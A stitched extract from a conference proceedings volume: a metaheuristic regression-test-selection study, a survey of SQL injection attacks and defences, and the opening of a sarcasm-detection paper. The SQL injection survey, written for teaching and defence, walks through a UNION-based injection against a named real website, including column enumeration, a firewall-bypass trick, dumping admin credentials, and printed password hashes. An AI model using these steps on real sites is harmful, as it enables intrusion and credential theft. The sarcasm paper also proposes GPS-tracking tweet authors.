Regression Test Case Selection:
A Comparative Analysis of Metaheuristic
Algorithms
Abstract Regression testing is an activity of finding bugs in the modified parts of the
software and releases the software versions timely to avoid further risks. Retesting of
all existing test cases including obsolete and redundant test cases is increasing the cost
and efforts of the overall process. In order to reduce this cost and time, optimization
algorithms are playing a vital role. This paper focuses on the performance analysis of
three recent metaheuristic algorithms: Cuckoo Search, Crow Search Algorithm, and
Harris Hawks Optimization to solve the RTCS problem for selecting the test cases.
Fault coverage and execution time parameters have been selected for performance
evaluation. The experiments are performed and analyzed on standard SIR repository.
The results and statistical tests show that Cuckoo Search and Crow Search Algorithm
significantly give better results for different parameters of RTCS problem than Harris
Hawks Optimization (HHO). The Cuckoo Search outperformed on fault coverage,
and Crow Search Algorithm outperformed on time parameter.
1 Introduction
The growth and success of any software industry are based on to fulfill the customer’s
requirements and deliver a quality product within the specified time period and in
mentioned budget. So, it is become difficult for industries to meet the everchanging
customer requirement and technology upgradation [1]. Testing is one of the essen-
tial phases of SDLC. Moreover, inefficient testing could lead to major economic
A. S. Verma (B)
Dr. A.P.J. Abdul Kalam Technical University, Lucknow, India
A. S. Verma · A. Choudhary
Sharda University, Greater Noida, India
S. Tiwari
ABES Engineering College, Ghaziabad, India
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 605
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_49
606 A. S. Verma et al.
losses during the development of any software. There exist different software testing
techniques: Regression testing is one of them. Regression testing plays an important
role in maintenance phase to test the quality of software in every updation cycle.
The test suite size increases as new test cases are added every time after addition
of new functionalities in the existing code. Rerunning entire test suite became time
consuming, sometimes it may take a week or more to perform regression testing [2].
In addition, regression testing generally consumes lots of computing resources [3].
Regression Test Case Selection (RTCS) [4–7] aims to select and run only those test
cases that are affected by the code change. RTCS is one of the most explored approach
of test suite optimization to reduce the efforts and cost of regression testing process.
RTCS is considered as an N-P hard problem. Various artificial intelligence algo-
rithms have already been used to solve this complex and multi-objective problem in a
shorter span of time [8–11]. Being a multi-objective problem, the use of metaheuristic
algorithms to solve RTCS is the most appropriate choice.
This paper focuses on the comparative analysis of three recent metaheuristic
algorithms: Cuckoo Search, Crow Search Algorithm, and Harris Hawks Optimiza-
tion to evaluate the performance of RTCS problem. An empirical study on twelve
subject programs retrieved from Software-artifact Infrastructure Repository (SIR)
[12]. Results are also compared with these adopted metaheuristic algorithms to
check which algorithm performs better and provides most optimized results to cover
maximum number of faults in minimum execution time.
Rest of the paper is organized as follows: Sect. 2 discusses the related work carried
out by previous researchers in the domain of RTCS. Section 3 briefly discusses the
problem statement. Section 4 gives an overview of CS, CSA, and HHO algorithms,
respectively. Section 5 presents experimental design and results obtained. Finally,
Sect. 6 concludes the paper with future scope.
2 Related Work
The existing large test suites are having some obsolete and redundant test cases as two
or more test cases are used for same faults or for same requirements which increases
the size of test suite. So, it is recommended to minimize the size of test suite [15]. In
this paper, the author has considered two test adequacy criteria: execution time and
total fault coverage of test cases.
Given: Suppose an existing software program denoted by SP and a modified version
of this program is denoted by SP’.The test suite of program SP is represented by
T S = tc1, tc2, tc3, . . . . . . . . . .tcm . Let n ≤ m is a number given, where n represents
size of optimal test suite and m represents the total number of fault count in SP.
608 A. S. Verma et al.
The Cuckoo Search (CS) was founded in 2009 by Xing Shi Yang [27]. This algorithm
mimics the parasitic behavior of Cuckoo bird and utilized levy flights technique.
Cuckoo bird lay their eggs in the other host bird’s nest and drops host’s bird eggs.
Some host birds either adjust with the cuckoo’s egg or some do not like intruders
and having issues with them. In such case, the host bird drops the cuckoo’s bird eggs
from their nest.
Cuckoo Search (CS) Algorithm works on three basic rules:
1. One cuckoo can lay only one egg at a time and randomly chosen the nest to lay
its egg in the nest.
2. The best nest having the highest quality of eggs will move in the next iteration.
3. There are fixed number host nests. The host bird can identify the cuckoo’s bird
egg with a probability p ∈ [0, 1] [28].
The Crow Search Algorithm (CSA) was founded by Askarzadeh et al. in 2016 [29].
CSA is inspired from the foraging behavior of crow flocks. Each crow hides their
extra food to his hiding space from the other crow flocks [30].
The implementation of Crow Search Algorithm (CSA) is based on concepts
mentioned in the following points:
• Crows are generally found in flocks.
• Crows memorize their food hiding locations.
• Crows will follow other crows in the flock to steal food.
• Crows are very careful against robbery and protect their stores by a probability.
In this section, the author has discussed experimental design, results, and performance
analysis of Cuckoo Search (CS), Crow Search Algorithm (CSA), and Harris Hawks
Optimization (HHO) Algorithm to find the optimal solution in terms of total fault
coverage and execution time of RTCS problem. The subsection discusses the research
objectives formed, parameters setting of different metaheuristic approaches, research
hypothesis, and subject programs utilized to evaluate the performance.
In this paper following research questions have been formed to evaluate and analyze
the performance of the used algorithms:
RQ1. Find out if there any significant differences in fault coverage capabilities of
three different adopted algorithms for the RTCS problem?
RQ2. Is there any effect of execution time on the performance of the three different
approaches used in the study?
610 A. S. Verma et al.
The parameter setting utilized for CS, CSA, and HHO on which the whole experiment
is performed are represented in Table 1:
In order to answer the research questions formed in sub-Sect. 5.1, two research
hypotheses have been formed:
Ho: CS = CSA = HHO.
Ha: CS = CSA = HHO.
Ho: Overall_Execution_Time of CS = Overall_Execution_Time of CSA =
Overall_Execution_Time of HHO.
Ha: Overall_Execution_Time of CS = Overall_Execution_Time of CSA =
Overall_Execution_Time of HHO.
In this experiment, these three algorithms are executed 15 times and no. of fault
covered is selected as evaluation parameter on control parameter setting already
discussed in Table 1. The total 500 iteration is considered as stopping criteria in
each run and also analyze the execution time required by each algorithm to catch
maximum no. of faults.
Answer to Research Question1:
In order to answer the Research Question1, we analyzed the mean values of total
fault coverage. Table 2 depicts the marginal means of fault coverage of different
algorithms on different subject programs. The highlighted mean is represented that
the Cuckoo Search (CS) algorithm performs better than the adopted algorithms, i.e.,
Crow Search Algorithm (CSA), and Harris Hawks Optimization (HHO) Algorithm
Regression Test Case Selection: A Comparative Analysis … 611
in terms of maximum fault coverage. The tests are performed with the help of SPSS
20 tool and results are represented in Table 2 and Table 3.
To again confirm the same results, a two-way ANOVA test is also performed and
significance value is obtained less than 0.05 with confidence interval 95% shown
in Table 3. The results show that null hypothesis is rejected in favor of alternate
hypothesis. Finally, Fig. 2 shows that the fault coverage capabilities of Cuckoo Search
are better than the other adopted algorithms.
Answer to Research Question 2:
In order to answer the Research Question2, we analyzed the marginal means of
execution time of three different algorithms. Table 4 shows that the mean execution
time of adopted algorithms. The highlighted mean value of execution time shows
that the Crow Search Algorithm (CSA) is significantly lesser than the other adopted
algorithms. In Table 5, a Two-way ANOVA test is conducted to further validate
the achieved results. The results of two-way ANONA test are represented that the
significance value is less than 0.05 which means that null hypothesis is rejected
in favor of alternate hypothesis. So, we state that the performance of Crow Search
Algorithm (CSA) in case of execution time is better than the CS and HHO algorithms.
Fig. 3 shows the estimated marginal means of execution time of adopted algo-
rithms which validate the above achieved results of Tables 4 and 5 that execution
time of CSA is better than the CS and HHO algorithms.
612 A. S. Verma et al.
On the basis of results collected and discussed in Sect. 5.4, the author concludes
the performance of all the adopted metaheuristic algorithms on RTCS. The answers
and results of framed research questions show that while solving RTCS problems
using fault coverage and execution time parameters, the performance of adopted
algorithms is also varying. The results reflets that the fault coverage capabilities of
Cuckoo Search (CS) algorithm are better than the CSA and HHO algorithms, on
other hand, the execution time of Crow Search Algorithm (CSA) is lesser than the
other adopted algorithms. But it is also clear from above results that Harris Hawks
Optimization (HHO) is not suitable to solve RTCS problems as it is not given better
results for both the parameters, i.e., fault coverage and execution time.
In the future, authors will evaluate the performance of other metaheuristic algo-
rithms to solve RTCS multi-objective problems in minimum execution time with
maximum fault coverage. Apart from RTCS problems, the authors can also perform
the comparative analysis of various recent metaheuristic algorithms to evaluate
the performance for Test suite minimization as well as for test case prioritization
problems.
References
1. Vierhauser, M., Rabiser, R., & Grünbacher, P. (2014). A case study on testing, commis-
sioning, and operation of very-large-scale software systems. In 36th International Conference
on Software Engineering, ICSE Companion 2014—Proceedings (pp. 125–134).
614 A. S. Verma et al.
2. Rothermel, G., Untch, R. H., Chu, C., & Harrold, M. J. (1999). Test case prioritization: an
empirical study. In 1999 International Conferences Software Maintenance ICSM99.
3. Zhang, L. (2018). Hybrid regression test selection. In ICSE ’18 40th International Conferences
Software Engineering (pp. 199–209).
4. Rothermel, G., & Harrold, M. J. (1997) A Safe , Efficient Regression Test Selection Technique,
no. 2, pp. 1–35.
5. Harrold, M. J., et al. (2011). Regression test selection for Java software. ACM SIGPLAN Not.,
36(11), 312–326.
6. Briand, L. C., Labiche, Y., & He, S. (2009). Automating regression test selection based on
UML designs. Information and Software Technology, 51(1), 16–30.
7. Orso, A., Shi, N., & Harrold, M. J. (2004) Scaling regression testing to large software systems.
In Proceedings of ACM SIGSOFT Symposium Foundation Software and Engineering (pp. 241–
251).
8. Fister, I., Yang, X. S., Brest, J., & Fister, D. (2013). A brief review of nature-inspired algorithms
for optimization. Elektroteh. Vestnik/Electrotechnical Rev., 80(3), 116–122.
9. Alzubi, O. A., Alzubi, J. A., Alweshah, M., Qiqieh, I., Al-Shami, S., & Ramachandran, M.
(2020). An optimal pruning algorithm of classifier ensembles: dynamic programming approach.
Neural Computer Application, 32(20), 16091–16107.
10. Alweshah, M., Alzubi, O. A., & Alzubi, J. A. (2016). Solving Attribute Reduction Problem
using Wrapper Genetic Programming. International Journal of Computer Science and Network
Security, 16(5), 77–84.
11. Alzubi, O., Alzubi, J., Tedmori, S., Rashaideh, H., & Almomani, O. (2018). Consensus-based
combining method for classifier ensembles. The International Arab Journal of Information
Technology, 15(1), 76–86.
12. Do, H., Elbaum, S., & Rothermel, G. (2005). Supporting controlled experimentation with
testing techniques: An infrastructure and its potential impact. Empirical Software Engineering,
10(4), 405–435.
13. Yoo, S., & Harman, M. (2007) Pareto efficient multi-objective test case selection. In 2007 ACM
International Symposium on Software Testing and Analysis ISSTA’07 (pp. 140–150).
14. Maia, C. L. B., Do Carmo, R. A. F., De Freitas, F. G., De Campos, G. A. L., & De Souza, J.
T. (2009). A Multi-objective approach for the regression test case selection problem. In XLI
Brazilian Symposium Operation Research XLI SBPO 2009 (pp. 1824–1835).
15. De Souza, L. S., & Prud, R. B. C. (2014). Multi-objective test case selection : a study of the
influence of the catfish effect on PSO based strategies. In An. do XV Work. Testes e Tolerância
a Falhas—WTF 2014 (pp. 3–58).
16. Narciso, E. N., Delamaro, M. E., & De Lourdes Dos Santos Nunes, F. (2014). Test case selection:
A systematic literature review. International Journal of Software Engineering and Knowledge
Engineering, 24(4), 653–676.
17. Panichella, A., Oliveto, R., Di Penta, M., & De Lucia, A. (2015). Improving multi-objective
test case selection by injecting diversity in genetic algorithms. IEEE Transactions on Software
Engineering, 41(4), 358–383.
18. Rosero, R. H., Gómez, O. S., & Rodríguez, G. (2016). 15 Years of software regression
testing techniques—A survey. International Journal of Software Engineering and Knowledge
Engineering, 26(5), 675–689.
19. Hafez, S., Elnainay, M., Abougabal, M., & Elshehaby, S. (2016). Potential-fault cache-based
regression test selection. In 2016 IEEE/ACS 13th International Conference of Computer
Systems and Applications (AICCSA) (vol. 0).
20. Kazmi, R., Jawawi, D. N. A., Mohamad, R., & Ghani, I. (2017) Effective regression test case
selection: A systematic literature review. ACM Computing Surveys, 50(2).
21. Choudhary, A., Agrawal, A. P., & Kaur, A. (2018). An effective approach for regression test
case selection using pareto based multi-objective harmony search. In Proceedings of the 11th
International Workshop on Search-Based Software Testing (vol. August, pp. 13–20).
22. Bajaj, A., Sangwan, O. P. (2018). A survey on regression testing using nature-inspired
approaches. In 2018 4th International Conference on Computing Communication and
Automation (ICCCA) (pp. 1–5).
Regression Test Case Selection: A Comparative Analysis … 615
23. Agrawal, A. P., & Kaur, A. (2018). A comprehensive comparison of ant colony and hybrid
particle swarm optimization algorithms through test case selection. Advances in Intelligent
Systems and Computing, 542(August), 397–405.
24. Correia, D., Abreu, R., Santos, P., Nadkarni, J. (2019) MOTSD: A multi-objective test selec-
tion tool using test suite diagnosability. In ESEC/FSE 2019—Proceedings of the 2019 27th
ACM Joint Meeting on European Software Engineering Conference and Symposium on the
Foundations of Software Engineering (no. May, pp. 1070–1074).
25. Gladston, A., & Niranjana Devi, N. (2020). Optimal test case selection using ant colony and
rough sets.International Journal of Applied Evolutionary Computation (IJAEC), 11(2), 1–14.
26. Agrawal, A. P., Choudhary, A., & Kaur, A. (2020). An effective regression test case selection
using hybrid whale optimization algorithm. International Journal of Distributed Systems and
Technologies (IJDST)., 11(1), 53–67.
27. Yang, X., Deb, S., & Behaviour, A. C. B. (2009). Cuckoo Search via L ´ evy Flights. In IEEE,
pp. 210–214.
28. Yang, X. S., & Deb, S. (2010). Engineering optimisation by cuckoo search. International
Journal of Mathematical Modelling and Numerical Optimisation, 1(4), 330–343.
29. Askarzadeh, A. (2016). A novel metaheuristic method for solving constrained engineering
optimization problems: Crow search algorithm. Computers and Structures, 169, 1–12.
30. Gupta, D., Rodrigues, J. J. P. C., Sundaram, S., Khanna, A., Korotaev, V., & de Albuquerque,
V. H. C. (2020). Usability feature extraction using modified crow search algorithm: A novel
approach. Neural Computing and Applications, 32(15), 10915–10925.
31. Heidari, A. A., Mirjalili, S., Faris, H., Aljarah, I., Mafarja, M., & Chen, H. (2019). Harris hawks
optimization: Algorithm and applications. Future Generation Computer Systems, 97(March),
849–872.
A Comprehensive Study on SQL
Injection Attacks, Their Mode, Detection
and Prevention
Abstract SQL injection indicates the type of attack that exploits vulnerability and
security prevailing in the database systems concerned with any application. This
vulnerability is mostly encountered within web pages having dynamic contents. In
this study, for any kind of vulnerability, we discuss the way how attackers of these
types could get benefit out of such vulnerability and execute vulnerable codes along
with the strategy to countermeasure such negative impacts associated with database
systems. In this context, web operations are commonly employed for online admin-
istrations spanning from high range of informal communication to administering
transaction accounts, while dealing with private user information which is confiden-
tial. However, the underlying problem is that, this information is vulnerable to attacks
owing to unauthorized access, where the attackers avail access into the system through
different hacking and cracking techniques with surprisingly negative intentions. The
attacker can employ some more well-versed queries and some novel strategies to
bypass the authentication while conjointly attaining complete control over the web
application as well as the server. A lot of novel algorithms have been developed
till now to encrypt data query for preventing such attacks by framing desired query
change plan. In this paper, we will be collaborating on the background of injec-
tion attack, types of injection attack, various case studies and preventive measures
associated with SQL injection attack along with a suitable illustration.
World Wide Web (WWW) undergoes marvelous peregrination within recent few
years. Businesses and government have come to know that web operation can provide
fruitful, well-planned and well-grounded resolution to the challenge of exchanging
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 617
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_50
618 S. Dasmohapatra and S. B. B. Priyadarshini
the data and managing business in the recent century. However, in the reduction
charge to conduct their applications online or possibly between simple ignorance,
different program corporations overlook or establish analytical safety concern [1].
WWW as a significant extension, but it strikes on expanding the web at the same time.
Therefore, functional safety operation on web implementation and communicating
through them appears to be significant [2]. To assemble correct approach, developers
must have the knowledge that security is a basic element of any software effect
and that protection must be immersed with the software as it is being written [1].
Classification of injection threats with the aid of way of the usage of SQL Injection;
consumer offers these files that are integrated to a Structured Query Language (SQL)
question in a different segment of database. In this phase, consumer’s facts are to
be recognized through SQL queries. SQL instructions are specified by the striker
directly or indirectly connected to the database by the particular exposure. This kind
of threats are unsafe for each web software that receives and records from clients,
and progresses are accompanied by SQL order to an important database [3].
Such an assault may moreover be carried out by including strings of harmful
symbols within statement values within structure otherwise through argumenta-
tive symbols through URL. Injection assaults in many stipulations receive bene-
fits of mistaken authentication through input/output information. Structured Query
Language Injection Attack (SQLIA) is a kind of query that injects codes that involves
injection of harmful SQL directions with the aid of ability of entered records
through patron to the utility which are thereafter surpassed for occasion of the
database for execution and with the purpose to have an impact on the performance of
default SQL guidelines [2]. There are various techniques that a web-designer/system-
administrator can provide up and contradictory results and assaults get assembled in
their systems. These strategies are used by a developer otherwise computer adminis-
trator makes use of top-notch strategies in enchantment cycle of utility which includes
use of parameterized codes, recent benefit, high-quality account, personalized error
note, etc., [2].
However, these strategies proceed to be the wonderful way to prevent SQL injec-
tion vulnerabilities. These kinds of methods are inclined to human blunders and are
no longer like fastidiously and honestly utilized as computerized methods. Although
maximum developers try to develop carefully the codes pertaining to websites, this is
challenging to defend developing the methods cautiously and successfully to every
resource of insertion. As a result, developers counseled a fluctuation of strategies and
techniques to aid developers and make up for fault within software program utility
of defensive coding. These strategies make use of static, dynamic or hybrid assess-
ment for detecting SQLIA. For example, as shown Fig. 1, an attacker for validation
normally gets in to a textual dialog box on online form by typing their username
and password to bypass the data-base security system by making the statement true
[4–6].
Moreover, additionally there are exceptional methods for opposing to SQLIA that
we specified in the rest of this paper. At the end, in this topic, SQL is geared up as given
in this paper. We start with the aid of way of motivating vulnerability thoughts and
introducing SQL injection attacks. Also, we are going to inquire existing taxonomy
A Comprehensive Study on SQL Injection Attacks … 619
of SQL fraud avoidance and identification point of view. We think and judge distinct
SQLIA opposing strategies and signify their distribution needs. At last, a speedy
resolution of this paper is given. Table 1 illustrates the vulnerabilities encountered
in various web applications.
Vulnerability is a prone spot within utility that can be a graph flaw or a develop-
ment fault. A web-striker can misuse this kind of vulnerabilities, for stealing indi-
vidual/company data. This kind of strike, broken authentication, cross-site scripting
(XSS), session management and cross-site request forgery (CSRF) are few program-
ming level vulnerabilities focused on maximum modern-day internet utility [1–10].
According to reviews that are furnished via the usage of ability of OWASP [5] and
WHID [6], they are striking SQLIA and XSS which are quite usual. SQLIA is taken
into consideration as excessive of assault striking personal data, stability and vacancy
of data. SQLI vulnerability is a kind of assaults providing SQL codes to an internet
structure entering container to achieve proper entry for adjusting data. Using this
vulnerability, an attacker may additionally choose to ship his instructions straight
away to web software and to smash overall performance. SQLI attack could be
labeled to five indispensable instructions based upon totally vulnerabilities within
web functions. This categorization is explained in Table 1 [7–10].
620 S. Dasmohapatra and S. B. B. Priyadarshini
Different information documents suggest that more than 40,000 assaults per day
give threats to the true world, so it is a massive hassle that wants some codes which
vary in functions. Now a day, many web programs are using databases for saving
the facts wished for the web applications points’ activity, as special as patron needs,
non-public data, sensitive financial archives and many others in one of a shape fields,
from finance and government to social network. All are gathering a range of utilized
sciences, thus approving programmers to develop web application for merchandise
A Comprehensive Study on SQL Injection Attacks … 621
fascinating and beneficial of customers (e.g., e-shop, net banking). Table 2 describes
the types of SQL Injection Attack.
3 Prevention System
switch ($TableName) {
case 'fooTable': return true;
case 'barTable': return true;
default: return new
ErrorDataException('unexpected value provided as table name');
}
<?php
if(isset($_POST["selRating"]))
{
$number = $_POST["selRating"];
if((is_numeric($number)) && ($number > 0) &&
may also desire to be beneath an assault and send malformed records even besides
their knowledge [10, 11].
This kind of method has some capability to compile the query before the execution of
the provided SQL codes. This approach understands the inputted codes and validates
with the database to get in to the server authentically [11]. Customer has entered some
furnished data to validate the authentication process. This kind of coding helps to
find SQLIA. It can be done by using some this kind of queries of MySQLI branch.
Currently, PHP 5.1 is now an upgraded version for this kind of MySQLI database
to prevent the injection attack. PHP Data Objects (PDO) carries out some strategies
which clarify the usage of this kind of query. However, PDO designs the codes to its
simplest form to be operated by different data servers like MySQL, etc., [8–11]. The
PHP code for parameterized query is illustrated in Fig. 5.
624 S. Dasmohapatra and S. B. B. Priyadarshini
<?php
$id = $_GET['id'];
$database_connection = new
PDO('mysql:host=localhost;dbname=sql_injection_exampl
e', 'dbuser', 'dbpasswd');
//preparing the query
$sql = "SELECT username FROM users WHERE id = :id";
$queries = $database_connection->prepare($sql);
$queries->bindParam(':id', $id);
$queries->execute();
//getting the result
$queries->setFetchMode(PDO::FETCH_ASSOC);
$result = $queries->fetchColumn();
print(htmlentities($result));
This method is used by the developer to make more than one group. Transact-SQL
query is used with logical segments to get some execution methods. This procedure
is always saved as named objects in the MySQL data server. In any kind of event, we
want to execute some codes that should be simplified by the stored procedure and
verify the same. The technique mentioned below is an example of stored procedure,
where we create a table using the stored procedure (Fig. 6).
Let’s consider here is an employer who wants to gather some information about
the salary from. In the beginning, we have to create a user named ‘examp’ as follows:
CREATE USER ’examp’@’localhost’ IDENTIFIED BY ’mypassword’;
This user only could have some authenticity to execute the query and to grab data
from the server as outlined below:
grant execute on windy.* to examp@‘%‘
DELIMITER $$
$database_connection = new
PDO('mysql:host=localhost;dbname=windy', 'examp',
'mypassword');
$queries = $database_connection->exec('call
avg_sal(@out)');
$resi = $queries->queries('select @out')->fetchAll();
print_r($resi);
3.4 Escaping
In this kind of prevention function, every time we have to do some work with char-
acter escaping method for customer provided input by DBMS. In this technique, the
SQL query which is given by the developer will not confuse the statement. Here,
we have used mysqli_real_escape_string() in PHP. Unintended SQL functions are
being provided. Here, we have provided a different way to bypass the login field
authentication [7] as shown in Fig. 9.
626 S. Dasmohapatra and S. B. B. Priyadarshini
Above code will be vulnerable by entering some character like ‘\’ which is called
as escaping character in front of a single quote. By this technique, we can prevent
SQLIA by having few alterations.
Root access devices can’t be validating any account of the database. It is wanted to
be carried out if truly wished, given that the attackers ought to reap to get admission
to total server [11]. Due to this idea, it is best to put into effect the least advantage
for data server to protect the software program in opposition to SQL injection [9].
This is the best prevention technique to avoid SQLIA. It is also called as web appli-
cation firewall (WAF) [12]. By the firewall technique, the database identifies threats
or malicious inputs by the user, which are being monitored. Basically, it is a check
point within internet and web functions for authentic login. Web application firewall
helps to secure the website by well-defined rules of safety guidelines. These kinds of
guidelines are different for every web application according to its need for security.
The policies of WAF inform the weakness of website and web security to the firewall
by searching procedures. After getting this information, WAF gets help to monitor
the users and their requests to find the malicious inputs and to block them [11, 12].
Web firewalls help to protect different malicious functions and security threats. Some
of them are cross-site scripting, poisoning of cookies, session hijacking, SQLIA, etc.
Moreover, web firewall also gives these benefits written over here.
• It automatically protects basic unknown and known malicious injection attacks.
• It also monitors HTTP and helps the web application for real-time safety when
the attacker is logging in or trying to get into the data server as unauthentic.
Finally, to avoid the malicious attack a developer should know about all kinds of
attacks and it’s prevention techniques for overcoming the security threats [11].
A Comprehensive Study on SQL Injection Attacks … 627
*Command used: order by n- (where n should start from 1 until another error occurs).
-----------------
Implementation.
-----------------
* http://tncgroup.pk/content.php?Id=2 order by n- (where n should startfrom1 until
another error occurs).
* http://tncgroup.pk/content.php?Id=2 order by 1-
* http://tncgroup.pk/content.php?Id=2 order by 2-
* http://tncgroup.pk/content.php?Id=2 order by 3-
*
*
*
* http://tncgroup.pk/content.php?Id=2 order by 14-
!!!!! Error occurs!!!!!
628 S. Dasmohapatra and S. B. B. Priyadarshini
Now we must find the vulnerable columns from the total 13 number of columns.
Command used: union select 1,2,3,4,5,6,7,8,9,10,11,13 --+
---------------------------------------------------------------------------
Implementation:http://tncgroup.pk/content.php?Id=-2 union select
1,2,3,4,5,6,7,8,9,10,11,12,13 --+
----------------------------------------------
* -(minus) is used before the parameter to bypass the Web application firewall (WAF).
Output:
We are getting the column 2 and 3, Where 2 is a bold than 3 , than means we will
proceed on 2.
Note:
-- write the function names in place of the vulnerable columns.
* to get the database name - database ()
* to get the version name - version ()
* to get the username - user ()
4.5 Step 5. Finding the Column Name from the Target Table
Command Used
group_concat(column_name)
630 S. Dasmohapatra and S. B. B. Priyadarshini
-
Command Used
---------------------
group_concat(plogin,0 × 3a,ppass).. //0 × 3a is used in between the column names
with coma(,) to distinguish the username and password.
from tbl_admin – +
* command 1 is used in place of vulnerable column we found and 2 is used at the
last that is after 13, which is the total no. of columns
Output.
----------
21232F297A57A5A743894A0E4A801FC3:
A Comprehensive Study on SQL Injection Attacks … 631
202CB962AC59075B964B07152D234B70
may be admin/123
to encrypt / decrypt: hashkiller.co.uk.
5 Conclusion
Structure Query Language Injection Attack technique is used for stealing data from
a web server. In this paper, we have learned about the types of the SQL attack, their
techniques, prevention and their methodologies. Here, we have observed that in every
web application there is a back end. In the back end, there is data server/ database.
If an attacker can bypass the authentication process and gets into the database and
can be able to see and grab the information from the database illegally then it will
be called as injection method. The SQLIA technique can be performed by a user
by bypassing login page by entering some malicious SQL codes or clauses to it.
To prevent such kind of attack, the developers should have some basic knowledge
about these techniques to prevent them. In the future, we will try to extract some new
prevention methods to secure our database by these types of attackers. Also, we have
to make some more research about the web firewalls to protect the web application.
Although various strategies have been developed to counter SQL injection attack,
still then more sophisticated fault tolerant and reliable algorithm can be developed
for providing better security to the system.
References
1. Shema, M. (2010). Seven Deadliest Web Application Attacks. Elsevier Inc., (pp. 47–69).
2. Halfond, W. G. J. & Orso, A. (2006). Preventing SQL injection attacks using Amnesia. In
Presented at the Proceedings of the 28th international conference on Software engineering
(ICSE), ACM, Shanghai, China, (vol. 11, pp. 795–798), May 20–28, (2006).
3. Alazab, A., & Khresiat, A. (2016) New strategy for mitigating of SQL injection attack.
International Journal of Computer Applications (IJCA), 154, 11.
4. Halfond, W. G., & Orso. A. (2005). Analysis and monitoring for neutralizing SQL-injection
attacks. In Proceedings of the 20th IEEE/ACM International Conference on Automated
Software Engineering.
5. Som, S., Sinha, S. & Kataria, R. (2016) Studyon SQL injection attacks mode, detection and
prevention. International Journal of Engineering Applied Sciences and Technology(IJEAST),
1(8), 212–220.
6. Dornseif, M. (2005). Common failures in internet applications. http://md.hudora.de/presentat
ions/2005-common-failures/dornseif-common-failures-(2005-05-5).pdf.
7. Patel, N. (2015) Implementation of pattern matching algorithm to defend SQLIA/International
Conference on Advanced Computing Technologies and Applications (ICACTA- 2015) /
Procedia Computer Science 45, pp. 444–450, ( 2015 ) https://www.ptsecurity.com/ww-en/
analytics/knowledge-base/how-to-prevent-sql-injection-attacks/.
8. Andreu, A. (2006). Professional Pen Testing for Web Applications. Wrox, 2, 113–120.
632 S. Dasmohapatra and S. B. B. Priyadarshini
9. Chris, A. (2010). Advanced SQL injection in SQL server applications, vol. 9, p. 2. http://www.
nextgenss.com/papers/advanced_sql_injection.pdf (2002).
10. Stephen, J. F. (2005). SQL Injection attacks by example, vol. 3, pp. 3–5
11. Elmasri, R., & Navathe, S. B. (2011). Fundamentals of database systems (6th ed.). United
States of America: Addison-Wesley.
12. Nithya, V., Regan, R, & Vijayaraghavan, J. (2013). A survey on SQL injection attacks, their
detection and prevention techniques. International Journal Of Engineering And Computer
Science (IJECS), 2(4), 886–905.
13. Limei, M., et al. (2019). Research on SQL injection attack and prevention technology based on
web. In International Conference on Computer Network, Electronic and Automation (pp. 176–
179).
14. Su, G., et al. (2018) Research on SQL injection vulnerability attack model. In 5th IEEE
International Conference on Cloud Computing and Intelligence System (pp. 217–221).
Sentimental Analysis on Sarcasm
Detection with GPS Tracking
Abstract Sentimental analysis which is also known as opinion mining is one of the
major tasks of natural language processing (NLP). Sentimental analysis is a technique
which is used to identify a person’s sentiment, humor and their emotion. Sarcastic
comments imply what a person wants to say in a conflicting manner. Sarcasm is being
generally used among numerous informal communication and smaller scale blogging
sites where individuals attack others which makes tricky for the person to state what
it implies. For example, many sarcastic tweets which gives a positive impact like,
“Technical talk right after lunch” but it describes an undesirable activity. There are
number of researches done in sarcasm. In this paper feature extraction techniques
were used, for instance, logistic regression, support vector machine (SVM), random
forest, etc. to recognize sarcasm in tweets from the twitter gliding API. The perfect
classifier is picked then joined along different pre-handling, separating methods
utilizing sarcastic and non-sarcastic lexicon mapping to give the most ideal precision.
A GPS tracking system is used collect the data and allocate to which location the
Tweets are coming from. The sarcastic and non-sarcastic word reference being the
shrewd idea introduced in this paper.
M. Sharan (B)
Computer Science and Engineering Department, Institute of Engineering and Technology,
Lucknow, India
e-mail: Msharan.csed.cf@ietlucknow.ac.in
M. Ravinder
Computer Science and Engineering Department, Indira Gandhi Delhi Technical University For
Women, Delhi, India
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 633
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_51
634 M. Sharan and M. Ravinder
1 Introduction
As of late social networking sections like Twitter, Instagram and Amazon have
obtained broad ubiquity along with its significance. Twitter be one of many biggest
sociable stage where individuals expressed their suppositions, emotions, perspectives
also continuous occasions, for example, live tweets and many others. Twitter permits
the clients to enlist the messages send and afterward peruse reply which are termed
as tweets. Sarcasm is a particular difficulty looked in sentimental analysis. Twitter
additionally empowers various clients to be able to communicate their thoughts along
with conclusions, another which empower many organizations to know how popular
assessment on their items or administrations can give the continuous client help.
Sarcasm is communicating pessimistic sentiments utilizing decisive words. Sarcasm
be likewise at the same time individual wants to determine something different from
what they talk. Sarcasm is utilized not exclusively for mockery yet in addition as
reprimanding others, aspect, thoughts and so forth because of which sarcasm is a
lot of utilized on Twitter. Sarcasm can be passed on in different manners like an
immediate discussion, speech, text and so on. It tends to be imitated utilizing ratings
by giving fewer number of stars.
Organizations continuously tap into social media trying to understand opinion of
customer around product, services and giving real time customer support. From a
research perspective, the various problem there are in natural language processing
(NLP), some problems are easy, and some problems are hard. It is widely believed
things like questions and answers, summarization in translation belongs to the cate-
gory of hard problems and sarcasm detection is one more addition to this. It is a
deliberate play on the part of the person, so the person plays with the language and
nuisances of the language to be able to communicate something sarcastically. Hence,
it is subtle in nature. It will be just a play of language, where a word is here or there
or a punctuation or a phrase.
A GPS tracking system is used in such a way that once it is detected that the
comment is sarcastic then GPS tracking is done, where the mechanism that it uses
is the global positioning system (GPS) for tracing any mobile or systems journey,
whereas determining their accurate location. The recording of the location data can be
stored in tracking device or can be transferred to an internet connected gadget using
the radio or the satellite modem already ingrained in the gadget unit. Aforementioned
will tell from where more sarcastic comments are coming so that they can be fixed,
like comments on politics, racism, etc. Therefore, to consolidate the aptitudes with
Twitter’s geolocation information and simple to-utilize usefulness of geo commons
to make an interactive map of the racist tweets.
